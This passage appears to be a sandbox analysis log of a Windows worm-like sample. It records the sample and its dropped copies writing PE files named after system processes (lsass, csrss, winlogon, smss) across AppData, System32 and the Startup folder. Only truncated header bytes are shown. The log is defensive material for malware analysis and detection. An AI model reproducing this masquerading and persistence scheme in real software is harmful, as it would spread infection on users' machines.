4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46953 bytes starting with PE header signature to file \"C:\\Data %OSUSER%.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\winlogon.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\services.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\lsass.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46936 bytes starting with PE header signature to file \"C:\\Windows\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46866 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46857 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46726 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46884 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46931 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46736 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46789 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46883 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46697 bytes starting with PE header signature to file \"C:\\Windows\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46882 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46856 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46758 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46922 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46893 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46878 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46881 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46809 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46904 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46725 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46760 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46767 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46782 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46743 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46844 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46873 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46906 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46873 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46867 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46893 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46938 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46822 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46870 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46769 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 